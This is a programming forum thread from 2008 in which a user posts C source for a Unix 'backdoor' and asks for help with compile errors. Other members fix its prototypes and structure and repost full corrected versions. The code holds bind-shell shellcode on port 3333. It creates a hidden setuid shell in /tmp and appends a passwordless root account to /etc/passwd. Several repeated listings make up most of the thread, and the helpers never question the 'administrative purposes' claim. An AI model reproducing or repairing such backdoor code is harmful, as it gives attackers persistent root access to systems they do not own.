Thread: saying hello and 1st question

  1. #1
    Registered User
    Join Date
    Oct 2008
    Posts
    3

    saying hello and 1st question

    ok so i coded a backdoor for administrative purposes and i get this error when attempting to compile
    Code:
    bd.c: In function ‘spawn’:
    bd.c:117: error: ‘shellcode’ undeclared (first use in this function)
    bd.c:117: error: (Each undeclared identifier is reported only once
    bd.c:117: error: for each function it appears in.)
    code is as follows
    Code:
    //*nix backdoor by darksys of DarpaNet
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    
    #define OPTIONS
    
    char *options_string[OPTIONS] = {
      //"-b",
      "-s",
      "-n",
      "-i",
      "-x"
    };
    char *opt_arg[OPTIONS] = { "-", "-n", "-i", "-x" };
    
    int
    main (int argc, char *argv[])
    {
      int c, d, e;
      if (argc == 1)
        {
          Title ();
          Functionality ();
          Usage ();
          return (0);
        }
    
      for (e = 1; e < argc; e++)
    
        if (!strcmp (argv[e], options_string[0]))
          {
    	Shell_Code ();
          }
    
      if (!strcmp (argv[e], options_string[1]))
        {
          Bash_Backdoor ();
        }
    
      if (!strcmp (argv[e], options_string[2]))
        {
          Add_Backdoor_User ();
        }
    
      if (!strcmp (argv[e], options_string[3]))
        {
          Information ();
        }
    
      if (!strcmp (argv[e], options_string[4]))
        {
          Contact_Info ();
        }
    }
    
    
    int
    Usage ()
    {
      printf ("Usage:\n");
      printf ("-b     {Spawn a Shell on port 3333}\n");
      printf ("-s     {creates suid sh in /tmp.}\n");
      printf ("-n     {creates root account with no pass}\n");
      printf ("-i     {information.}\n");
      printf ("-x     {contact info.}\n");
    }
    
    int
    Title ()
    {
      Bold ("S");
      printf ("imple ");
      Bold ("B");
      printf ("ackdoor ");
      Bold ("U");
      printf ("tility\n");
      printf ("By darksys of Darpanet - [email protected]\n");
      printf ("\n");
    }
    
    int
    Functionality ()
    {
      printf ("Current Functionality:\n");
      printf ("  --spawns a shell on port 3333\n");
      printf ("  --create suid shell in /tmp\n");
      printf ("  --creates a root user\n\n");
    }
    
    int
    Shell_Code ()
    {
      char shellcode[] =
        "\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2 \x52"
        "\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x6a\x02\x5b"
        "\x6a\x66\x58\xcd\x80\x6a\x66\x58\x6a\x04\x5b\xcd\x80\x31\xc9\x51\x51\x56\x89\xe1"
        "\x6a\x05\x5b\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
        "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
    }
    
    
    void
    SET_PORT (char *buf, int port)
    {
      *(unsigned short *) (((buf) + 22)) = (port);
      char tmp = buf[22];
      buf[22] = buf[23];
      buf[23] = tmp;
    }
    
    spawn ()
    {
      printf ("size: %d bytes\n");
      (strlen (shellcode));
    
      SET_PORT (shellcode, 3333);
      __asm__ ("call shellcode");
    }
    
    
    int
    Bash_Backdoor ()
    {
      printf ("Darpanet Backdoor\n");
      printf ("adding bash backdoor... (-s)\n");
      system ("cp /bin/sh /tmp/.sh\n");
      system ("chmod 4711 /tmp/.sh\n");
      printf ("done.\n");
      printf ("exec /tmp/.sh\n");
    }
    
    int
    Add_Backdoor_User ()
    {
      FILE *fd;
      printf ("Darpanet Backdoor\n");
      printf ("\nadding backdoor... (-u)\n");
      fd = fopen ("/etc/passwd", "a+");
      fprintf (fd, "r00t::0:0::/:/bin/sh\n");
      printf ("done.\n");
      printf ("r00t account added\n\n");
    }
    
    int
    Information ()
    {
      printf ("Information:\n");
      printf ("Darpanet Backdoor\n");
      Usage ();
    }
    
    int
    Contact_Info ()
    {
      printf ("\t       Contact\n");
      printf ("\thttp://www.e-gang.biz\n");
      printf ("\[email protected]\n");
    }
    
    int
    Bold (char *pass)
    {
      char ESC = 27;
      printf ("%c[1m", ESC);
      printf ("%s", pass);
      printf ("%c[0m", ESC);
    }

  2. #2
    Banned master5001's Avatar
    Join Date
    Aug 2001
    Location
    Visalia, CA, USA
    Posts
    3,685
    You need function prototypes.

  3. #3
    Banned master5001's Avatar
    Join Date
    Aug 2001
    Location
    Visalia, CA, USA
    Posts
    3,685
    Code:
    spawn ()
    {
      printf ("size: &#37;d bytes\n");
      (strlen (shellcode));
    
      SET_PORT (shellcode, 3333);
      __asm__ ("call shellcode");
    }
    Friends don't let friends write code that horrible. A function is implicitly an int. Therefore this one is wrong all the way around.

    Ok dude... I actually just read your code all the way through. Your compiler is being generous. There are so many flaws in your code I don't know where to begin... So gimme a second to format them.

    [edit]

    Code:
    const char *options_string[OPTIONS] = {
      //"-b",
      "-s",
      "-n",
      "-i",
      "-x"
    };
    const char *opt_arg[OPTIONS] = { "-", "-n", "-i", "-x" };
    
    void Usage (void);
    void Title (void);
    void Functionality (void);
    void Shell_Code (void);
    void SET_PORT (char *buf, int port);
    void spawn (char *shellcode);
    void Bash_Backdoor (void);
    void Add_Backdoor_User (void);
    void Information (void);
    void Contact_Info (void);
    void Bold (char *pass);
    Just start off with prototyping and fixing your code to match my prototypes.
    [/edit]
    Last edited by master5001; 10-31-2008 at 12:26 PM.

  4. #4
    Registered User
    Join Date
    Oct 2008
    Posts
    3
    thanks m8 im new to coding so heh

  5. #5
    Banned master5001's Avatar
    Join Date
    Aug 2001
    Location
    Visalia, CA, USA
    Posts
    3,685
    Yeah no problem. You will likely get some new compiler errors after you add those lines to your code, however its one step closer to having a working program.

  6. #6
    Registered User
    Join Date
    Oct 2008
    Posts
    3
    how is this looking?

    Code:
    //*nix backdoor by darksys of DarpaNet
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    
    #define OPTIONS
    
    char *options_string[OPTIONS] = {
      "-b",
      "-s",
      "-n",
      "-i",
      "-x"
    };
    char *opt_arg[OPTIONS] = { "-", "-n", "-i", "-x" };
    
    
    void
    main (int argc, char *argv[])
    {
      int c, d, e;
      if (argc == 1)
        {
          Title ();
          Functionality ();
          Usage ();
          return (0);
        }
    
      for (e = 1; e < argc; e++)
    
        if (!strcmp (argv[e], options_string[0]))
          {
    	Shell_Code ();
          }
    
      if (!strcmp (argv[e], options_string[1]))
        {
          Bash_Backdoor ();
        }
    
      if (!strcmp (argv[e], options_string[2]))
        {
          Add_Backdoor_User ();
        }
    
      if (!strcmp (argv[e], options_string[3]))
        {
          Information ();
        }
    
      if (!strcmp (argv[e], options_string[4]))
        {
          Contact_Info ();
        }
    }
    
    
    void
    Usage (void);
    {
      printf ("Usage:\n");
      printf ("-b     {Spawn a Shell on port 3333}\n");
      printf ("-s     {creates suid sh in /tmp.}\n");
      printf ("-n     {creates root account with no pass}\n");
      printf ("-i     {information.}\n");
      printf ("-x     {contact info.}\n");
    }
    
    void
    Title (void);
    {
      Bold ("S");
      printf ("imple ");
      Bold ("B");
      printf ("ackdoor ");
      Bold ("U");
      printf ("tility\n");
      printf ("By darksys of Darpanet - [email protected]\n");
      printf ("\n");
    }
    
    void
    Functionality (void);
    {
      printf ("Current Functionality:\n");
      printf ("  --spawns a shell on port 3333\n");
      printf ("  --create suid shell in /tmp\n");
      printf ("  --creates a root user\n\n");
    }
    
    void
    Shell_Code (void);
    {
      char sc[] =
        "\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2 \x52"
        "\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x6a\x02\x5b"
        "\x6a\x66\x58\xcd\x80\x6a\x66\x58\x6a\x04\x5b\xcd\x80\x31\xc9\x51\x51\x56\x89\xe1"
        "\x6a\x05\x5b\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
        "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
    }
    
    void SET_PORT (char *buf, int port)
    {
      *(unsigned short *) (((buf) + 22)) = (port);
      char tmp = buf[22];
      buf[22] = buf[23];
      buf[23] = tmp;
    }
    
    void spawn (char *sc);
    { 
     printf ("size: %d bytes\n");
      (strlen (sc));
    
      SET_PORT (sc, 3333);
      __asm__ ("call sc");
    }
    
    
    void
    Bash_Backdoor (void);
    {
      printf ("Darpanet Backdoor\n");
      printf ("adding bash backdoor... (-s)\n");
      system ("cp /bin/sh /tmp/.sh\n");
      system ("chmod 4711 /tmp/.sh\n");
      printf ("done.\n");
      printf ("exec /tmp/.sh\n");
    }
    
    void
    Add_Backdoor_User (void);
    {
      FILE *fd;
      printf ("Darpanet Backdoor\n");
      printf ("\nadding backdoor... (-u)\n");
      fd = fopen ("/etc/passwd", "a+");
      fprintf (fd, "r00t::0:0::/:/bin/sh\n");
      printf ("done.\n");
      printf ("r00t account added\n\n");
    }
    
    void
    Information (void);
    {
      printf ("Information:\n");
      printf ("Darpanet Backdoor\n");
      Usage ();
    }
    
    void
    Contact_Info (void);
    {
      printf ("\t       Contact\n");
      printf ("\thttp://www.e-gang.biz\n");
      printf ("\[email protected]\n");
    }
    
    void
    Bold (char *pass)
    {
      char ESC = 27;
      printf ("%c[1m", ESC);
      printf ("%s", pass);
      printf ("%c[0m", ESC);
    }

  7. #7
    Kernel hacker
    Join Date
    Jul 2007
    Location
    Farncombe, Surrey, England
    Posts
    15,677
    Seeing as this "hack" is from 2005, I'd expect that most systems have a fix to cover it...

    It took me one google search to figure out what the code is.

    Edit: And by the way, there is a typo in your code.

    --
    Mats
    Last edited by matsp; 10-31-2008 at 01:12 PM.
    Compilers can produce warnings - make the compiler programmers happy: Use them!
    Please don't PM me for help - and no, I don't do help over instant messengers.

  8. #8
    C++まいる!Cをこわせ!
    Join Date
    Oct 2007
    Location
    Inside my computer
    Posts
    24,654
    You seem confused. You need prototypes and function definitions.
    A prototype should look identical to the function definition header, except it shall have a semicolon at the end.

    Example:
    Code:
    void foo(char* unused);
    void foo(char* unused)
    {
        // Stuff here
    }
    Further, main shall return int. Always.
    The local variable sc is never used inside the function and is worthless, because it will be destroyed once the function ends.
    The printf call with the "size" is wrong, because you are supposed to an argument, but you never do. Instead you add it as its own line, which does absolutely nothing.
    Those are a more few things that you should learn to fix.
    Quote Originally Posted by Adak View Post
    io.h certainly IS included in some modern compilers. It is no longer part of the standard for C, but it is nevertheless, included in the very latest Pelles C versions.
    Quote Originally Posted by Salem View Post
    You mean it's included as a crutch to help ancient programmers limp along without them having to relearn too much.

    Outside of your DOS world, your header file is meaningless.

  9. #9
    Banned master5001's Avatar
    Join Date
    Aug 2001
    Location
    Visalia, CA, USA
    Posts
    3,685
    Code:
    //*nix backdoor by darksys of DarpaNet
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    
    #define OPTIONS
    
    const char *options_string[OPTIONS] = {
      //"-b",
      "-s",
      "-n",
      "-i",
      "-x"
    };
    const char *opt_arg[OPTIONS] = { "-", "-n", "-i", "-x" };
    
    void Usage (void);
    void Title (void);
    void Functionality (void);
    void Shell_Code (void);
    void SET_PORT (char *buf, int port);
    void spawn (char *shellcode);
    void Bash_Backdoor (void);
    void Add_Backdoor_User (void);
    void Information (void);
    void Contact_Info (void);
    void Bold (char *pass);
    
    int
    main (int argc, char *argv[])
    {
      int c, d, e;
      if (argc == 1)
        {
          Title ();
          Functionality ();
          Usage ();
          return (0);
        }
    
      for (e = 1; e < argc; e++)
    
        if (!strcmp (argv[e], options_string[0]))
          {
    	Shell_Code ();
          }
    
      if (!strcmp (argv[e], options_string[1]))
        {
          Bash_Backdoor ();
        }
    
      if (!strcmp (argv[e], options_string[2]))
        {
          Add_Backdoor_User ();
        }
    
      if (!strcmp (argv[e], options_string[3]))
        {
          Information ();
        }
    
      if (!strcmp (argv[e], options_string[4]))
        {
          Contact_Info ();
        }
    }
    
    
    void
    Usage (void);
    {
      printf ("Usage:\n");
      printf ("-b     {Spawn a Shell on port 3333}\n");
      printf ("-s     {creates suid sh in /tmp.}\n");
      printf ("-n     {creates root account with no pass}\n");
      printf ("-i     {information.}\n");
      printf ("-x     {contact info.}\n");
    }
    
    void
    Title (void)
    {
      Bold ("S");
      printf ("imple ");
      Bold ("B");
      printf ("ackdoor ");
      Bold ("U");
      printf ("tility\n");
      printf ("By darksys of Darpanet - [email protected]\n");
      printf ("\n");
    }
    
    void
    Functionality (void)
    {
      printf ("Current Functionality:\n");
      printf ("  --spawns a shell on port 3333\n");
      printf ("  --create suid shell in /tmp\n");
      printf ("  --creates a root user\n\n");
    }
    
    void
    Shell_Code (void)
    {
      char sc[] =
        "\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2 \x52"
        "\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x6a\x02\x5b"
        "\x6a\x66\x58\xcd\x80\x6a\x66\x58\x6a\x04\x5b\xcd\x80\x31\xc9\x51\x51\x56\x89\xe1"
        "\x6a\x05\x5b\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
        "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
    }
    
    void SET_PORT (char *buf, int port)
    {
      *(unsigned short *) (((buf) + 22)) = (port);
      char tmp = buf[22];
      buf[22] = buf[23];
      buf[23] = tmp;
    }
    
    void spawn (char *sc)
    { 
     printf ("size: &#37;d bytes\n", strlen (sc));
    
      SET_PORT (sc, 3333);
      __asm__ ("call sc");
    }
    
    
    void
    Bash_Backdoor (void)
    {
      printf ("Darpanet Backdoor\n");
      printf ("adding bash backdoor... (-s)\n");
      system ("cp /bin/sh /tmp/.sh\n");
      system ("chmod 4711 /tmp/.sh\n");
      printf ("done.\n");
      printf ("exec /tmp/.sh\n");
    }
    
    void
    Add_Backdoor_User (void)
    {
      FILE *fd;
      printf ("Darpanet Backdoor\n");
      printf ("\nadding backdoor... (-u)\n");
      fd = fopen ("/etc/passwd", "a+");
      fprintf (fd, "r00t::0:0::/:/bin/sh\n");
      printf ("done.\n");
      printf ("r00t account added\n\n");
    }
    
    void
    Information (void)
    {
      printf ("Information:\n");
      printf ("Darpanet Backdoor\n");
      Usage ();
    }
    
    void
    Contact_Info (void)
    {
      printf ("\t       Contact\n");
      printf ("\thttp://www.e-gang.biz\n");
      printf ("\[email protected]\n");
    }
    
    void
    Bold (char *pass)
    {
      char ESC = 27;
      printf ("%c[1m", ESC);
      printf ("%s", pass);
      printf ("%c[0m", ESC);
    }
    Its kinda looking better. Though that is also kind of a relative thing. Keep up the good work.
    Last edited by master5001; 10-31-2008 at 02:22 PM. Reason: Copy and paste woes. Thanks Elysia, I don't know what I'd do without you.

  10. #10
    C++まいる!Cをこわせ!
    Join Date
    Oct 2007
    Location
    Inside my computer
    Posts
    24,654
    You forgot to remove the semicolons after the function definitions... or someone did.
    Quote Originally Posted by Adak View Post
    io.h certainly IS included in some modern compilers. It is no longer part of the standard for C, but it is nevertheless, included in the very latest Pelles C versions.
    Quote Originally Posted by Salem View Post
    You mean it's included as a crutch to help ancient programmers limp along without them having to relearn too much.

    Outside of your DOS world, your header file is meaningless.

  11. #11
    Banned master5001's Avatar
    Join Date
    Aug 2001
    Location
    Visalia, CA, USA
    Posts
    3,685
    Another thing I would suggest is using loops for your options too.... If this isn't terribly over your head....


    Example:
    Code:
    typedef void (*command)(void);
    
    command option_commands[] =
    {
      Shell_Code,
      Bash_Backdoor,
      Add_Backdoor_User,
      Information,
      Contact_Info
    };
    
    int
    main (int argc, char *argv[])
    {
      int c, d, e, f;
      if (argc == 1)
        {
          Title ();
          Functionality ();
          Usage ();
          return (0);
        }
    
      for (e = 1; e < argc; e++)
        for(f = 0; f < sizeof(options_strings) / sizeof(*options_string); f++)
          if (!strcmp (argv[e], options_string[f]))
            options_command[f]();
    
      return 0; // not required, but you really should...
    }

  12. #12
    Registered User ssharish2005's Avatar
    Join Date
    Sep 2005
    Location
    Cambridge, UK
    Posts
    1,732
    You forgot to specify the value for your macro. You code needs a quite lot of work by the looks of it. I am surprised that the compiler dint generates any warnings or error.

    There are few things which you will have to look at. Check out the braces there? They are need to be right, I mean placed in the right place. If they aren't you will have problem with the scope!

    You have divided up your good. I really appreciate that. But make you when and where they need to be called.

    Few issues with the file handling. Make sure you check for the return value of fopen always. Some times when the file cannot be opened the fopen would return error which you trap and avoid reading from NULL.

    ssharish
    Life is like riding a bicycle. To keep your balance you must keep moving - Einstein

  13. #13
    Banned master5001's Avatar
    Join Date
    Aug 2001
    Location
    Visalia, CA, USA
    Posts
    3,685
    Not to mention that often times a file may not be physically written to until you call fflush() or fclose(). You should be fclose()'ing anyway.

Popular pages Recent additions subscribe to a feed